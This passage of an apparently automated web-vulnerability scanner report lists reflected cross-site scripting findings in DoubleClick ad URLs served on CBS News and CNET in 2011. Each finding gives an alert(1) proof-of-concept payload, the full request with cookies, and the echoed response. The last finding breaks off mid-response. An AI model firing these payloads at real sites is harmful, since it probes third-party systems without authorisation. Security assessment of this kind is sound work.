3.110. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [sg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 404ce"-alert(1)-"ab245d7300d was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230404ce"-alert(1)-"ab245d7300d&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5616

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
t/click%3Bh%3Dv8/3af6/17/160/%2a/r%3B234979442%3B3-0%3B0%3B57848298%3B4307-300/250%3B41001877/41019664/2%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230404ce"-alert(1)-"ab245d7300d&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra
...[SNIP]...

3.111. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d202"-alert(1)-"0e7554cedd3 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=1623d202"-alert(1)-"0e7554cedd3&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5616

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
9442%3B3-0%3B0%3B57848298%3B4307-300/250%3B41001877/41019664/2%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=1623d202"-alert(1)-"0e7554cedd3&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641
...[SNIP]...

3.112. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24b5c"-alert(1)-"693c8060cdc was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=1368224b5c"-alert(1)-"693c8060cdc&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
leclick.net/click%3Bh%3Dv8/3af6/17/160/%2a/i%3B234979442%3B2-0%3B0%3B57848298%3B4307-300/250%3B40430358/40448145/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=1368224b5c"-alert(1)-"693c8060cdc&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=
...[SNIP]...

3.113. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72656"-alert(1)-"4f84709e101 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.3272656"-alert(1)-"4f84709e101&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.3272656"-alert(1)-"4f84709e101&event=58/http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;

...[SNIP]...

3.114. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [b parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82c48'-alert(1)-'d6f94ea770e was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=582c48'-alert(1)-'d6f94ea770e&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
3B61499020%3B4307-300/250%3B41885699/41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=582c48'-alert(1)-'d6f94ea770e&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mz
...[SNIP]...

3.115. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [b parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4704"-alert(1)-"c0ca4634e03 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5a4704"-alert(1)-"c0ca4634e03&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
3B61499020%3B4307-300/250%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5a4704"-alert(1)-"c0ca4634e03&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mz
...[SNIP]...

3.116. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccf37"-alert(1)-"dd1f54e8ddd was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815ccf37"-alert(1)-"dd1f54e8ddd&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54539

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815ccf37"-alert(1)-"dd1f54e8ddd&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event
...[SNIP]...

3.117. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c58a'-alert(1)-'e02ed8d2af6 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=200578159c58a'-alert(1)-'e02ed8d2af6&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54539

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=200578159c58a'-alert(1)-'e02ed8d2af6&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event
...[SNIP]...

3.118. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [count parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b88b2'-alert(1)-'0ab3a2f4648 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=b88b2'-alert(1)-'0ab3a2f4648&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=b88b2'-alert(1)-'0ab3a2f4648&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.119. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [count parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5db19"-alert(1)-"34a1cc021fa was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=5db19"-alert(1)-"34a1cc021fa&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
